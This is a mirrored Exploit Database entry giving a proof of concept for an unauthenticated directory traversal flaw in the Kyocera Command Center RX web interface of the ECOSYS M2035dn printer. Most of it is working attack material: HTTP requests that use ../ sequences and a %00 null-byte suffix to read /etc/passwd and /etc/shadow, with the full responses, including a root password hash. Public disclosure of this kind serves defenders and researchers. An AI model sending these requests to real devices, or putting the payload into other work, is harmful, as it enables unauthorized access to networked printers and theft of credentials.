Kyocera Command Center RX ECOSYS M2035dn – Directory Traversal File Disclosure (Unauthenticated)

• Exploit Database
• 17 阅读

• 作者： Luis Martínez
  日期： 2022-02-11
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50738/

• # Exploit Title: Kyocera Command Center RX ECOSYS M2035dn - Directory Traversal File Disclosure (Unauthenticated) 
  # Author: Luis Martinez
  # Discovery Date: 2022-02-10
  # Vendor Homepage: https://www.kyoceradocumentsolutions.com/asia/en/products/business-application/command-center-rx.html
  # Tested Version: ECOSYS M2035dn
  # Tested on: Linux
  # Vulnerability Type: Directory Traversal File Disclosure (Unauthenticated)
  
  # Proof of Concept:
  # 1.- Create a directory traversal payload
  # 2.- Add nullbyte to the end of the payload(%00)
  # 3.- Sent your request
  
  Request 1:
  
  GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1
  Cookie: rtl=0
  Host: X.X.X.X
  Connection: Keep-alive
  Accept-Encoding: gzip,deflate
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
  Accept: */*
  
  Response 1:
  
  HTTP/1.1 200 OK
  Content-Length: 844
  Upgrade: TLS/1.0
  Accept-Encoding: identity
  Date: Thu, 10 Feb 2022 15:55:57 GMT
  Server: KM-MFP-http/V0.0.1
  Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
  ETag: "/js/../../../../../../../../etc/passwd, Thu, 10 Feb 2022 15:25:48 GMT"
  Content-Type: image/jpeg
  
  root:x:0:0:root:/root:/bin/sh
  bin:x:1:1:bin:/bin:/bin/sh
  daemon:x:2:2:daemon:/usr/sbin:/bin/sh
  sys:x:3:3:sys:/dev:/bin/sh
  adm:x:4:4:adm:/var/adm:/bin/sh
  lp:x:5:7:lp:/var/spool/lpd:/bin/sh
  sync:x:6:8:sync:/bin:/bin/sync
  shutdown:x:7:9:shutdown:/sbin:/sbin/shutdown
  halt:x:8:10:halt:/sbin:/sbin/halt
  mail:x:9:11:mail:/var/mail:/bin/sh
  news:x:10:12:news:/var/spool/news:/bin/sh
  uucp:x:11:13:uucp:/var/spool/uucp:/bin/sh
  operator:x:12:0:operator:/root:/bin/sh
  games:x:13:60:games:/usr/games:/bin/sh
  ftp:x:15:14:ftp:/var/ftp:/bin/sh
  man:x:16:20:man:/var/cache/man:/bin/sh
  www:x:17:18:www-data:/var/www:/bin/sh
  sshd:x:18:19:sshd:/var/run/sshd:/bin/sh
  proxy:x:19:21:proxy:/bin:/bin/sh
  telnetd:x:20:22:proxy:/bin:/bin/sh
  backup:x:34:34:backup:/var/backups:/bin/sh
  ais:x:101:101:ais:/var/run/ais:/bin/sh
  nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  
  Request 2:
  
  GET /js/../../../../../../../../etc/shadow%00.jpg HTTP/1.1
  Cookie: rtl=0
  Host: X.X.X.X
  Connection: Keep-alive
  Accept-Encoding: gzip,deflate
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64)
  Accept: */*
  
  Response 2:
  
  HTTP/1.1 200 OK
  Content-Length: 480
  Upgrade: TLS/1.0
  Accept-Encoding: identity
  Date: Thu, 10 Feb 2022 16:10:16 GMT
  Server: KM-MFP-http/V0.0.1
  Last-Modified: Thu, 10 Feb 2022 15:25:48 GMT
  ETag: "/js/../../../../../../../../etc/shadow, Thu, 10 Feb 2022 15:25:48 GMT"
  Content-Type: image/jpeg
  
  root:$1$7NzW9Q4N$hXTtMygKjVUdJtW86EH3t1:15873::::::
  bin:*:15873::::::
  daemon:*:15873::::::
  sys:*:15873::::::
  adm:*:15873::::::
  lp:*:15873::::::
  sync:*:15873::::::
  shutdown:*:15873::::::
  halt:*:15873::::::
  mail:*:15873::::::
  news:*:15873::::::
  uucp:*:15873::::::
  operator:*:15873::::::
  games:*:15873::::::
  ftp:*:15873::::::
  man:*:15873::::::
  www:*:15873::::::
  sshd:*:15873::::::
  proxy:*:15873::::::
  telnetd:*:15873::::::
  backup:*:15873::::::
  ais:*:15873::::::
  nobody:*:15873::::::